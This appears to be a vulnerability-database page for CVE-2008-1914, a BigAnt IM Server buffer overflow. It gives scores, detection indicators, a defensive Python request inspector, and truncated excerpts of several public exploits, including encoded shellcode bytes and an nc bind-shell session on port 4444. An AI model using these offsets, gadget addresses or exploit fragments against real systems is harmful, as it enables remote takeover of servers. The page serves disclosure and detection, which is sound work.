CVE-2008-1914
Published 2008-04-22
Priority: P2 · 70 · critical · 10 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT: available
EPSS: 73.72% (99.4th percentile)
Stack-based buffer overflow in the AntServer module (AntServer.exe) in BigAnt IM Server in BigAnt Messenger 2.2 allows remote attackers to execute arbitrary code via a long URI in a request to TCP port 6080. NOTE: some of these details are obtained from third party information.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bigantsoft | bigant_messenger | — | — |
Detection & IOCs (extracted from sources)
- bytes: \xeb\x06\x90\x90
- bytes: \x6a\x19\x9a\x0f
- bytes: \xc3\x20\xc4\x6b
- Detect exploit attempts by monitoring for oversized GET requests (>950 bytes in URI) sent to TCP port 6080 targeting AntServer.exe
- Detect exploit attempts by monitoring for oversized GET requests (~985 bytes junk + SEH overwrite) sent to TCP port 6660
- SEH overwrite occurs at offset 989 in the GET request buffer; look for the short-jump NOP sled pattern \xeb\x06\x90\x90 at that offset
- Payload uses the AlphanumUpper encoder; look for all-uppercase alphanumeric shellcode following the SEH overwrite in GET requests to ports 6080/6660
- The p/p/r gadget from VBAJET32.dll (0x0f9a196a) is used as the SEH handler address; flag connections where this value appears in the GET request body
- The p/p/r gadget from MFC42.DLL (0x6bc420c3) is used as the SEH handler address in the universal exploit variant
- Successful exploitation results in a bind shell on TCP port 4444 on the victim; monitor for unexpected listening services on that port after connections to 6080/6660
- Two different default ports are used depending on the BigAnt version targeted: TCP 6080 for version 2.2 and TCP 6660 for version 2.50 SP1; detection rules must cover both ports
- The CVE-2008-1914 reference is reused for the BigAnt 2.50 SP1 module, though it is noted as potentially incorrect ('It's not clear if these are correct - there was a fix for the v2.2 vuln back in Dec 2008')
- Bad characters for payload encoding are \x00\x20\x0a\x0d (null, space, LF, CR); detection signatures based on raw shellcode bytes must account for alphanumeric encoding
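A small request inspector, added here as an example and not taken from any of the exploits or sources referenced on this page, that applies the indicators above to one captured request payload. Ports, the URI threshold, the nSEH pattern and the handler addresses are the values stated on the page; the two sample requests are constructed and contain no shellcode.

```python
import re

# Heuristics taken from the indicator list on this page; sample traffic at the
# bottom is constructed for demonstration and carries no shellcode.
BIGANT_PORTS = {6080, 6660}          # v2.2 default and v2.50 SP1 default
URI_LEN_THRESHOLD = 950              # oversized-URI threshold from the indicators
SHORT_JMP_NOP = b"\xeb\x06\x90\x90"  # short jump + NOPs written into nSEH
PPR_GADGETS = {                      # pop/pop/ret handler addresses, little-endian
    b"\x6a\x19\x9a\x0f": "VBAJET32.dll 0x0f9a196a",
    b"\xc3\x20\xc4\x6b": "MFC42.DLL 0x6bc420c3 (universal variant)",
}
ALNUM_UPPER_RUN = re.compile(rb"[A-Z0-9]{200,}")  # AlphanumUpper-encoded payload


def inspect_request(dst_port, data):
    """Return {tag: detail} for every indicator matched in one request payload."""
    findings = {}
    if dst_port not in BIGANT_PORTS or not data.startswith(b"GET "):
        return findings
    # The URI runs from after "GET " to the next space (or to the end if none).
    uri_end = data.find(b" ", 4)
    uri = data[4:] if uri_end == -1 else data[4:uri_end]
    if len(uri) > URI_LEN_THRESHOLD:
        findings["oversized_uri"] = "%d bytes (> %d)" % (len(uri), URI_LEN_THRESHOLD)
    nseh = data.find(SHORT_JMP_NOP)
    if nseh != -1:
        findings["seh_short_jump"] = "at offset %d" % nseh
    for gadget, name in PPR_GADGETS.items():
        pos = data.find(gadget)
        if pos != -1:
            findings["ppr_gadget"] = "%s at offset %d" % (name, pos)
    # Only look for the encoded payload once an SEH-overwrite marker is present.
    if nseh != -1 or "ppr_gadget" in findings:
        if ALNUM_UPPER_RUN.search(data[max(nseh, 0):]):
            findings["alnum_upper_payload"] = "uppercase alphanumeric run after SEH overwrite"
    return findings


# Constructed samples: a normal request and one shaped like the indicators above.
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: bigant\r\n\r\n"
SUSPECT = (b"GET /" + b"A" * 980 + SHORT_JMP_NOP + b"\x6a\x19\x9a\x0f"
           + b"Z" * 300 + b" HTTP/1.1\r\n\r\n")

if __name__ == "__main__":
    for port, payload in [(6080, BENIGN), (6080, SUSPECT), (8080, SUSPECT)]:
        print(port, inspect_request(port, payload) or "clean")
```

The same request to a port other than 6080/6660 is ignored, so the rule stays scoped to the BigAnt listeners the indicators name.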
No detection rules found.
Exploit-DB
BigAnt Server 2.50 SP1 - Remote Buffer Overflow (Metasploit)
exploitdb · 2010-07-03 · CVE-2008-1914
---
```ruby
##
# $Id: bigant_server_250.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BigAnt Server 2.50 SP1 Buffer Overflow',
      'Description'    => %q{
          This exploits a stack buffer overflow in the BigAnt Messaging Service,
        part of the BigAnt Server product suite. This module was tested
        successfully against version 2.50 SP1.
      },
      'Author'         => [ 'Dr_IDE ' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9669 $',
      'References'     =>
        [
          # It's not clear if thes
```
Exploit-DB
BigAnt Server 2.2 - Remote Buffer Overflow (Metasploit)
exploitdb · 2010-05-09 · CVE-2008-1914
---
```ruby
##
# $Id: bigant_server.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BigAnt Server 2.2 Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in BigAnt Server 2.2.
        By sending a specially crafted packet, an attacker may be
        able to execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9262 $',
      'References'     =>
        [
          [ 'CVE', '2008-1914' ],
          [ 'OSVDB', '44454' ],
          [ 'BID', '2879
```
Exploit-DB
BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)
exploitdb · 2009-09-15 · CVE-2009-4660
---
```python
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>

import socket, sys

if len(sys.argv) != 3:
    print "\n[*] Usage: %s \n" % sys.argv[0]
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])  # port 6660 by default

# windows/shell_bind_tcp - 696 bytes Encoder:
```
Exploit-DB
BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH)
exploitdb · 2009-09-15 · CVE-2009-4660
---
```python
#!/usr/bin/python
# by hack4love
# BigAnt Server version 2.50 SEH Overwrite Universal
# discovered by Blake http://www.milw0rm.com/exploits/9673
# Tested on Windows XP SP2
# gratez to Blake
# use >> bigant.py 192.168.1.12 6660

import socket, sys

if len(sys.argv) != 3:
    print "\n[*] Usage: %s \n" % sys.argv[0]
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])  # port 6660 by default

shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x
```
Exploit-DB
BigAnt Server 2.2 - Remote Overflow (SEH)
exploitdb · 2008-04-15 · CVE-2008-1914
---
```python
#!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 1
```
Metasploit
BigAnt Server 2.2 Buffer Overflow
This module exploits a stack buffer overflow in BigAnt Server 2.2. By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
Metasploit
BigAnt Server 2.50 SP1 Buffer Overflow
This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.50 SP1.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/29831
- http://www.securityfocus.com/archive/1/490916/100/0/threaded
- http://www.securityfocus.com/archive/1/491035/100/0/threaded
- http://www.securityfocus.com/bid/28795
- http://www.vupen.com/english/advisories/2008/1238/references
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41830
- https://www.exploit-db.com/exploits/5451